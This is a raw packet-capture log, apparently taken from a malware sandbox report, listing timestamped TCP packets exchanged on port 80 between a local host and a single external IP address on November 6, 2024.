                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137840033 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137860060 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137865067 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137876987 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137888908 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137896061 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137900114 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137917042 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137923956 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137933969 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137948990 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137949944 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137964010 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137983084 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138025999 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138041019 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138051987 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138057947 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138063908 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138092995 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138168097 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138187885 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138204098 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138211966 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138216972 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138230085 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138242960 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138447046 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138461113 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138472080 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138479948 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138492107 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138508081 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138509035 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138521910 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138525009 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138539076 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138550997 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138561010 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138562918 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138572931 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138585091 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138590097 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138597012 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138613939 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138622046 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138633966 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138637066 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138648987 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138665915 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138680935 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138694048 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138704062 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138716936 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138731003 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138734102 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138745070 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138745070 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138760090 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138761044 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138776064 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138787031 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138793945 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138799906 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138813019 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138819933 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.138847113 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139731884 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139744997 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139755964 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139799118 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139866114 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139878035 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139890909 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139906883 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139916897 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139919043 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139931917 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139944077 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139950037 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139956951 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139970064 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139978886 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.139998913 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140006065 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140017986 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140028954 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140038967 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140059948 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140072107 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140079021 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140083075 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140094995 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140103102 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140111923 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140125036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140129089 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140134096 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140146971 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140151978 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140163898 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140167952 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140176058 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140192986 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140208006 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140211105 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140219927 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140227079 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140232086 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140243053 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140250921 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140254974 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140266895 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140278101 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140279055 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140299082 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140328884 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140341043 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140357018 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140360117 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140373945 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140386105 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140397072 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140399933 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140408993 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140415907 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140419960 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140433073 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140434980 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140444040 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140461922 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140469074 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140472889 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140485048 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140497923 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140499115 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140508890 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140518904 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140527010 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140541077 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140544891 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140554905 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140566111 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140575886 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140575886 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140589952 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140602112 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140602112 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140630007 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140640974 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140651941 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140666962 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140671015 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140678883 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140690088 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140700102 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140703917 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140716076 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140726089 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140727043 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140741110 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140750885 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140753031 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140763998 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140774965 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140777111 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140795946 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140799046 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140810013 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140824080 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140835047 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140839100 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140846968 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140852928 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140858889 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140876055 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140882015 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140887976 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140893936 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140903950 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140916109 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140917063 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140933990 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140935898 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140945911 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140950918 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140963078 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140975952 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140983105 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.140988111 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141000032 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141011953 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141021967 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141028881 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141041994 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141055107 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141072989 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141073942 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141073942 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141083956 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141089916 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141098022 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141114950 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141118050 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141132116 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141144991 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141155005 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141155005 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141171932 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141182899 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141192913 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141195059 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141205072 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141208887 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141216993 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141228914 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141232014 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141239882 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141251087 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141252041 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141264915 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141275883 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141278982 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141289949 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141300917 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141309977 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141315937 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141326904 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141330004 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141340017 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141355038 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141367912 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141371965 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141383886 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141391993 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141407967 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141412973 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141427994 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141443968 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141444921 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141455889 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141468048 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141479015 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141484022 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141490936 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141494989 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141503096 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141516924 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141525984 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141526937 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141540051 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141551971 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141556025 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141573906 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141585112 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141586065 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141601086 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141604900 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141618967 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141630888 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141642094 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141645908 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141653061 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141658068 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141666889 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141679049 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141691923 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141701937 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141705036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141716003 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141724110 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141727924 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141736984 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141742945 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141760111 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141763926 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.141771078 CET8049719185.215.113.16192.168.2.5
